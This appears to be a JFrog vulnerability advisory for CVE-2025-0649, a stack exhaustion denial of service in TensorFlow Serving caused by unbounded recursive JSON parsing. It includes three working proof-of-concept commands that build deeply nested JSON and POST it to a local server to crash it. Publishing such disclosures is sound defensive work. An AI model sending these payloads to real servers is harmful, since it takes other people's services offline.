< Back

- Tensorflow Serving Stack Exhaustion DoS

CVE-2025-0649 | CVSS 8.9

JFrog Severity:high

Discovered ByOri Hollanderof the JFrog Security Research Team

Published 6 May, 2025 | Last updated 6 May, 2025

This vulnerability allows unauthenticated remote attackers to cause the server to stop responding to requests due to a stack exhaustion when parsing malformed JSON input

Tensorflow Serving

(, 2.17.0]

TensorFlow Serving uses RapidJSON to process JSON input. The function ParseJson in json-tensor.cc uses RapidJSON’s ParseStream function to parse the JSON input. The default behavior of RapidJSON’s parsing function is [to parse the input recursively](https://rapidjson.org/md_doc_features.html#Parsing:~:text=Parsing-,Recursive (default),-and iterative parser) with no limit on the recursion depth. A malicious JSON string with an array or object that are deeply nested in each other can cause the server to crash.

Run TensorFlow Serving using the instructions in the page: https://www.tensorflow.org/tfx/serving/docker.

Then, run any of the following commands in a shell -

  1. python -c 'print("{\"instances\": [1.0, 2.0, 5.0],\"signature_name\":" + "[" * 500000 + "]" * 500000 + "}")' > /tmp/malicious.txt curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict
    
  2. python -c 'print("{\"instances\": [1.0, 2.0, 5.0],\"signature_name\":" + "[" * 50000 + "]" * 50000 + "}")' > /tmp/malicious.txt curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict
    
  3. python -c 'print("{\"instances\":" + "[" * 50000 + "1" + "]" * 50000 + "}")' > /tmp/malicious.txt curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict
    

The server will crash.

No mitigations are supplied for this issue

Fix commit

< Back